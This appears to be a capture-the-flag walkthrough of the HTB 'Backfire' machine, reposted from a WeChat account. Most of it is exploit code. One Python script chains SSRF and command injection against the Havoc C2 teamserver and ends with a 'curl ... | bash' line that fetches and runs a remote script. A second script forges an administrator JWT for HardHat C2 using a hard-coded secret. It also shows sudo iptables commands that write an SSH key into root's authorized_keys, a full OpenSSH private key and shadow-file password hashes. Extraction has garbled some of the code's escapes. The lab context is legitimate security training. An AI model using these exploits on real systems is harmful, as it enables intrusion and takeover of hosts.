nmap -A -v -T4 10.10.11.49
https://github.com/chebuya/Havoc-C2-SSRF-poc
https://github.com/syncwithali/HavocExploit
https://github.com/IncludeSecurity/c2-vulnerabilities.git
import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
from Crypto.Cipher import AES
from Crypto.Util import Counter
# Silence urllib3's InsecureRequestWarning: every requests.post() in this
# script passes verify=False, so TLS certificate validation is off for the
# whole run and the warning would otherwise fire on each request.
urllib3.disable_warnings()
# AES-256 key length in bytes; encrypt()/decrypt() pad shorter keys up to it.
key_bytes = 32
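def _aes_ctr_cipher(key, iv):
    """Return an AES-CTR cipher object for *key* and *iv*.

    Shared by encrypt() and decrypt(), which differ only in the direction
    of the final call. A key shorter than ``key_bytes`` is right-padded
    with ASCII ``b"0"`` (0x30) bytes, exactly as the original helpers did;
    a longer key is rejected instead of failing an ``assert`` (which is
    stripped under ``python -O``).

    Args:
        key: AES key as bytes, at most ``key_bytes`` long.
        iv: Counter start value, read as a big-endian integer that seeds a
            full-block (``AES.block_size * 8`` = 128-bit) counter.

    Raises:
        ValueError: if *key* is longer than ``key_bytes``.
    """
    if len(key) > key_bytes:
        raise ValueError(f"key must be at most {key_bytes} bytes, got {len(key)}")
    # ljust never mutates the caller's object; the original ``key += b"0"``
    # would have grown a bytearray argument in place.
    key = bytes(key).ljust(key_bytes, b"0")
    iv_int = int(binascii.hexlify(iv), 16)
    ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
    return AES.new(key, AES.MODE_CTR, counter=ctr)


def decrypt(key, iv, ciphertext):
    """Decrypt *ciphertext* with AES-CTR and return the plaintext bytes.

    Key padding and counter construction are described on _aes_ctr_cipher().
    CTR mode carries no integrity check, so a modified ciphertext decrypts
    silently to garbage rather than raising.
    """
    return _aes_ctr_cipher(key, iv).decrypt(ciphertext)


def int_to_bytes(value, length=4, byteorder="big"):
    """Encode the non-negative integer *value* as *length* bytes.

    Defaults to a 4-byte big-endian field, the width used for the length
    and id fields built elsewhere in this script. Raises OverflowError when
    *value* does not fit in *length* bytes (or is negative).
    """
    return value.to_bytes(length, byteorder)


def encrypt(key, iv, plaintext):
    """Encrypt *plaintext* with AES-CTR and return ciphertext of equal length.

    Key padding and counter construction are described on _aes_ctr_cipher().
    A caller that reuses one (key, iv) pair across messages reuses the
    keystream: CTR gives no confidentiality under nonce reuse and no
    integrity protection.
    """
    return _aes_ctr_cipher(key, iv).encrypt(plaintext)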
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
    """POST a spoofed agent-registration message to the teamserver listener.

    Builds the registration body from the caller-supplied attributes (all
    ``bytes``) and the module globals ``agent_id``, ``AES_Key``, ``AES_IV``,
    ``magic``, ``teamserver_listener_url`` and ``headers``, which are
    assigned at module level after the function definitions. The body is
    sent unencrypted, and it carries the key and IV the "agent" will use
    for later messages. Prints the outcome; returns None. Any status other
    than 200 is reported as a failure.
    """
    # NOTE(review): the byte literals below read as 12-byte ASCII strings
    # ("x00x00x00x63"); the backslashes of the \x escapes appear to have
    # been lost when this page was extracted. Reproduced as found.
    command = b"x00x00x00x63"
    request_id = b"x00x00x00x01"
    demon_id = agent_id
    # Each variable-length field is preceded by a 4-byte big-endian length.
    hostname_length = int_to_bytes(len(hostname))
    username_length = int_to_bytes(len(username))
    domain_name_length = int_to_bytes(len(domain_name))
    internal_ip_length = int_to_bytes(len(internal_ip))
    # The length is reduced by 6; the script does not say why (the caller
    # passes process_name UTF-16LE encoded) — TODO confirm against the
    # agent protocol before relying on it.
    process_name_length = int_to_bytes(len(process_name) - 6)
    data = b"xab" * 100
    header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
    # Outer header: total size (12 header bytes + body), fixed magic, agent id.
    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    print(agent_header + header_data)
    print("[+] Trying to register agent...")
    # Certificate validation is disabled for this request.
    r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[+] Success!")
    else:
        print(f"[-] Failed to register agent - {r.status_code} {r.text}")
def open_socket(socket_id, target_address, target_port):
    """Ask the teamserver to open a forwarding socket to target_address:target_port.

    The inner package is encrypted with the module-level ``AES_Key``/``AES_IV``
    (the same values register_agent() put in its registration body), wrapped
    in the size + ``magic`` + ``agent_id`` outer header, and POSTed to
    ``teamserver_listener_url`` with ``headers``. Prints the outcome and
    returns None.

    Args:
        socket_id: identifier bytes chosen by the caller; write_socket() and
            read_socket() must be given the same value.
        target_address: dotted-quad IPv4 string.
        target_port: integer port number.
    """
    # Byte literals reproduced as found on the page (the \x escapes appear
    # to have been lost during extraction).
    command = b"x00x00x09xec"
    request_id = b"x00x00x00x02"
    subcommand = b"x00x00x00x10"
    sub_request_id = b"x00x00x00x03"  # assigned but never used below
    # Fixed filler values for the local-endpoint fields.
    local_addr = b"x22x22x22x22"
    local_port = b"x33x33x33x33"
    # Octets are emitted in reverse order, i.e. the address is little-endian.
    forward_addr = b""
    for octet in target_address.split(".")[::-1]:
        forward_addr += int_to_bytes(int(octet), length=1)
    forward_port = int_to_bytes(target_port)
    package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port
    # The inner length prefix counts itself (+4).
    package_size = int_to_bytes(len(package) + 4)
    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    data = agent_header + header_data
    print("[+] Trying to open socket on the teamserver...")
    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[+] Success!")
    else:
        print(f"[-] Failed to open socket on teamserver - {r.status_code} {r.text}")
def write_socket(socket_id, data):
    """Send *data* (bytes) through the teamserver-side socket *socket_id*.

    Same framing as open_socket(): a length-prefixed inner package encrypted
    with the module-level ``AES_Key``/``AES_IV``, then the size + ``magic``
    + ``agent_id`` outer header, POSTed to ``teamserver_listener_url``.
    Prints the raw request bytes and the outcome; returns None.
    """
    # Byte literals reproduced as found on the page (the \x escapes appear
    # to have been lost during extraction).
    command = b"x00x00x09xec"
    request_id = b"x00x00x00x08"
    subcommand = b"x00x00x00x11"
    sub_request_id = b"x00x00x00xa1"  # assigned but never used below
    socket_type = b"x00x00x00x03"
    success = b"x00x00x00x01"
    # 4-byte big-endian length of the payload that follows.
    data_length = int_to_bytes(len(data))
    package = subcommand + socket_id + socket_type + success + data_length + data
    # The inner length prefix counts itself (+4).
    package_size = int_to_bytes(len(package) + 4)
    header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)
    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    post_data = agent_header + header_data
    print(post_data)
    print("[+] Trying to write to the socket")
    r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[+] Success!")
    else:
        print(f"[-] Failed to write data to the socket - {r.status_code} {r.text}")
def read_socket(socket_id):
    """Poll the teamserver for output queued on the socket and return it.

    Sends an unencrypted command + request id (``socket_id`` itself is not
    placed in the request body) and decrypts the reply with the module-level
    ``AES_Key``/``AES_IV``.

    Returns:
        The decrypted package minus its first 12 bytes (``bytes``) on HTTP
        200, or the empty ``str`` ``""`` on any other status — note the two
        return types differ.
    """
    # Byte literals reproduced as found on the page (the \x escapes appear
    # to have been lost during extraction).
    command = b"x00x00x00x01"
    request_id = b"x00x00x00x09"
    header_data = command + request_id
    size = 12 + len(header_data)
    size_bytes = size.to_bytes(4, 'big')
    agent_header = size_bytes + magic + agent_id
    data = agent_header + header_data
    print("[+] Trying to poll teamserver for socket output...")
    r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
    if r.status_code == 200:
        print("[+] Read socket output successfully!")
    else:
        print(f"[-] Failed to read socket output - {r.status_code} {r.text}")
        return ""
    # Reply header is parsed little-endian, unlike the big-endian fields built
    # for requests; the three values are decoded but not used afterwards.
    command_id = int.from_bytes(r.content[0:4], "little")
    request_id = int.from_bytes(r.content[4:8], "little")
    package_size = int.from_bytes(r.content[8:12], "little")
    enc_package = r.content[12:]
    # No length or integrity check on the reply before decrypting (CTR mode
    # has none of its own); a short or tampered body is returned as-is.
    return decrypt(AES_Key, AES_IV, enc_package)[12:]
def create_websocket_request(host, port):
    """Return the raw bytes of an HTTP/1.1 WebSocket upgrade request for /havoc/.

    The caller pushes the result through the teamserver-side socket opened
    by open_socket(), so ``host``/``port`` name the endpoint that socket
    points at, not the listener URL. The handshake uses a fixed
    Sec-WebSocket-Key instead of a fresh random nonce, which makes the
    request trivially fingerprintable on the wire.
    """
    # NOTE(review): every header line ends in the literal text "rn"; the
    # backslashes of "\r\n" appear to have been lost during extraction, so
    # as written this is not a CRLF-delimited request. Several f-strings
    # also contain no placeholders. Reproduced as found.
    request = (
        f"GET /havoc/ HTTP/1.1rn"
        f"Host: {host}:{port}rn"
        f"Upgrade: websocketrn"
        f"Connection: Upgradern"
        f"Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg==rn"
        f"Sec-WebSocket-Version: 13rn"
        f"rn"
    ).encode()
    return request
def build_websocket_frame(payload):
    """Wrap the text *payload* in one masked, final WebSocket frame.

    Produces a client-to-server frame per RFC 6455: FIN set, opcode 0x1
    (text), the MASK bit set on the length byte, a 4-byte random masking
    key from ``os.urandom``, and the UTF-8 payload XORed with that key.
    The length field widens to 2 or 8 bytes as the payload grows.

    Returns:
        A ``bytearray`` holding the complete frame.
    """
    body = payload.encode("utf-8")
    size = len(body)
    out = bytearray([0x81])  # FIN=1, RSV=000, opcode=1 (text)
    # Length field with the MASK bit (0x80); width depends on the size.
    if size < 126:
        out.append(0x80 | size)
    elif size < 65536:
        out.append(0x80 | 126)
        out += size.to_bytes(2, "big")
    else:
        out.append(0x80 | 127)
        out += size.to_bytes(8, "big")
    mask = os.urandom(4)
    out += mask
    # Mask byte i with key byte i mod 4 (``i & 3`` for non-negative i).
    out += bytes(byte ^ mask[i & 3] for i, byte in enumerate(body))
    return out
# ---- Command-line options ---------------------------------------------------
# Only the listener URL and the forward target are mandatory; every other
# value describes the spoofed agent and has a default.
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")
args = parser.parse_args()
# ---- Module globals read by the request builders defined above -------------
# NOTE(review): the byte literals in this section are reproduced as found on
# the page; their \x escapes appear to have been lost during extraction.
magic = b"xdexadxbexef"
teamserver_listener_url = args.target
headers = {
    "User-Agent": args.user_agent
}
# Random agent id and PID so repeated runs do not collide. random.randint is
# not a CSPRNG, but nothing here depends on unpredictability.
agent_id = int_to_bytes(random.randint(100000, 1000000))
# All-zero key and IV. The "agent" picks its own session key and ships it in
# the registration body, and every later message reuses this one (key, IV)
# pair, so the encrypted traffic is decryptable by anyone who captures it.
# A fixed key/IV is also a straightforward network signature for this tool.
AES_Key = b"x00" * 32
AES_IV = b"x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
process_name = args.process_name.encode("utf-16le")  # UTF-16LE, unlike the other fields
process_id = int_to_bytes(random.randint(1000, 5000))
# Step 1: register the spoofed agent. Nothing in this script authenticates
# beyond producing the expected message format.
register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)
# Step 2: have the teamserver open a socket to args.ip:args.port.
socket_id = b"x11x11x11x11"
open_socket(socket_id, args.ip, int(args.port))
# Operator credentials and the management endpoint used for the WebSocket
# login below; hard-coded for the write-up's target.
USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"
host = "127.0.0.1"
port = 40056
# Step 3: push an HTTP upgrade request through the opened socket, then poll.
# read_socket()'s return value is stored but never inspected, here and below.
websocket_request = create_websocket_request(host, port)
write_socket(socket_id, websocket_request)
response = read_socket(socket_id)
# Step 4: login event. The password is SHA3-256 hashed client-side before it
# is sent; the "Time" strings in these messages are fixed values.
payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)
# Step 5: create a listener named "abc", referenced by the next message.
payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)
# Step 6: a payload-build request whose "Service Name" config field carries
# the ``injection`` string. The server-side mitigation is to validate and
# quote every user-supplied field before it reaches the build command line.
# NOTE(review): the dict literal below is syntactically broken as shown
# (inner quotes and "\n" escapes were lost in extraction); reproduced as found.
cmd = "curl http://10.10.14.9/rce.sh | bash"
injection = """ \\\" -mbla; """ + cmd + """ 1>&2 && false #"""
payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{n "Amsi/Etw Patch": "None",n "Indirect Syscall": false,n "Injection": {n "Alloc": "Native/Syscall",n "Execute": "Native/Syscall",n "Spawn32": "C:\\Windows\\SysWOW64\\notepad.exe",n "Spawn64": "C:\\Windows\\System32\\notepad.exe"n },n "Jitter": "0",n "Proxy Loading": "None (LdrLoadDll)",n "Service Name":"" + injection + "",n "Sleep": "2",n "Sleep Jmp Gadget": "None",n "Sleep Technique": "WaitForSingleObjectEx",n "Stack Duplication": falsen}n", "Format": "Windows Service Exe", "Listener": "abc"}, "SubEvent": 2}, "Head": {
    "Event": 5, "OneTime": "true", "Time": "18:39:04", "User": USER}}
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)
command:python3 havoc_rce.py --target https://10.10.11.49/ -i 127.0.0.1 -p 40056
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
import jwt
import datetime
import uuid
import requests
# ---------------------------------------------------------------------------
# Second script: mint an administrator JWT with a known HS256 signing secret,
# then use it to register a new "TeamLead" account via /Login/Register.
# There are no functions; the file runs top to bottom on import. ``jwt`` is
# presumably PyJWT (jwt.encode(payload, key, algorithm=...)) — confirm.
# ---------------------------------------------------------------------------
# Configuration
rhost = '127.0.0.1:5000' # Host for the API endpoint
# A static, installation-wide HS256 secret lets anyone who learns it sign
# tokens for any subject and role; the server-side fix is a per-install
# random secret (or asymmetric signing) plus rotation.
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq" # Secret key for JWT signing
issuer = "hardhatc2.com" # Issuer of the JWT
# Debug: Print configuration settings
print("[+] Configuration set:")
print(f" rhost: {rhost}")
print(f" secret: {secret[:5]}...") # Print part of the secret to avoid full exposure
print(f" issuer: {issuer}")
# Create JWT Token for Admin user
# NOTE(review): utcnow() returns a *naive* datetime, and .timestamp() on a
# naive value (used for "iat"/"exp" below) interprets it in the machine's
# local zone, so the claims are off by the local UTC offset unless the host
# runs in UTC. utcnow() is also deprecated since Python 3.12 in favour of
# datetime.datetime.now(datetime.timezone.utc).
now = datetime.datetime.utcnow() # Get current UTC time
expiration = now + datetime.timedelta(days=28) # Set expiration date for 28 days from now
# Debug: Show time information
print("[+] Current UTC time:", now)
print("[+] Expiration time:", expiration)
# Define JWT Payload. "iss" and "aud" are both set to the issuer string;
# the two URI-style claim names follow the .NET ClaimTypes convention.
payload = {
    "sub": "HardHat_Admin", # Subject (the user that the token is for)
    "jti": str(uuid.uuid4()), # Unique identifier for the token
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1", # Name identifier
    "iss": issuer, # Issuer of the token
    "aud": issuer, # Audience for the token
    "iat": int(now.timestamp()), # Issued at time (in seconds since epoch)
    "exp": int(expiration.timestamp()), # Expiration time (in seconds since epoch)
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator" # Role of the user
}
# Debug: Show payload before encoding
print("[+] JWT Payload:")
for key, value in payload.items():
    print(f" {key}: {value}")
# Encode JWT with the secret and HS256 algorithm
token = jwt.encode(payload, secret, algorithm="HS256")
# Debug: Show generated JWT token (first 50 characters for brevity)
print("[+] Generated JWT (first 50 chars):")
print(token[:50])
# Use Admin JWT to create a new user 'pfapostol' as TeamLead
burp0_url = f"https://{rhost}/Login/Register" # URL for the user registration endpoint
# Debug: Show the URL for registration
print("[+] Sending request to URL:", burp0_url)
# Set headers for the request including the Authorization token
burp0_headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}
# JSON data to register the new user
burp0_json = {
    "password": "pfapostol", # Password for the new user
    "role": "TeamLead", # Role to be assigned to the new user
    "username": "pfapostol" # Username for the new user
}
# Debug: Show headers and payload for the request.
# NOTE(review): this prints burp0_headers in full, i.e. the complete bearer
# token, which undoes the truncation applied to ``secret`` above; anything
# capturing stdout (terminal logs, CI output) now holds a valid admin token.
print("[+] Headers and JSON payload:")
print(" Headers:", burp0_headers)
print(" JSON Payload:", burp0_json)
# Send the POST request to register the new user. Certificate validation is
# disabled (verify=False); no timeout is set, so a silent server hangs the run.
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
# Debug: Show response status and content
print("[+] Response status code:", r.status_code)
print("[+] Response content:", r.text)
# Two commands from the write-up's privilege-escalation step: the first adds
# an iptables rule whose comment text is an SSH public key, the second writes
# the current ruleset with `iptables-save -f` to a path under /root/.ssh.
# Mitigation: a sudoers entry for an unprivileged user must not allow
# iptables-save with a caller-chosen -f output path (nor iptables with
# free-form rule comments); pin the permitted command to a fixed argument
# list and keep /root/.ssh/authorized_keys under file-integrity monitoring.
# The "$'n..." quoting appears to have lost a backslash (ANSI-C "\n") during
# extraction; reproduced as found.
sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFafyRywbrdQjXxVMl1rKsXLVdY4xnkFTNAAkDGRPsiJ root@v-vn'
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
root:$y$j9T$YhphiLO.G4w3yAv438MQP/$3JhvSgFS6VV4F79Mi5VuQDkhg63yMgjbpy.krot/tn.:19996:0:99999:7:::
daemon:*:19993:0:99999:7:::
bin:*:19993:0:99999:7:::
sys:*:19993:0:99999:7:::
sync:*:19993:0:99999:7:::
games:*:19993:0:99999:7:::
man:*:19993:0:99999:7:::
lp:*:19993:0:99999:7:::
mail:*:19993:0:99999:7:::
news:*:19993:0:99999:7:::
uucp:*:19993:0:99999:7:::
proxy:*:19993:0:99999:7:::
www-data:*:19993:0:99999:7:::
backup:*:19993:0:99999:7:::
list:*:19993:0:99999:7:::
irc:*:19993:0:99999:7:::
_apt:*:19993:0:99999:7:::
nobody:*:19993:0:99999:7:::
systemd-network:!*:19993::::::
systemd-timesync:!*:19993::::::
messagebus:!:19993::::::
ilya:$y$j9T$QAKBQrxLvdJTOvPiSUD8Z.$970OYpnfl/koGTRGPbmxntWv/HzGp5Nrjr7Vwfv6NXA:19996:0:99999:7:::
sshd:!:19993::::::
sergej:$y$j9T$ToRPOlaRsEcSVPj7IrwIw/$7WM.jKKviRj8JoXWN2pjVqrxuunYDv/G4b0PHmsEFd2:19996:0:99999:7:::
_laurel:!:20069::::::
原文始发于微信公众号(Jiyou too beautiful):HTB-Backfire
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。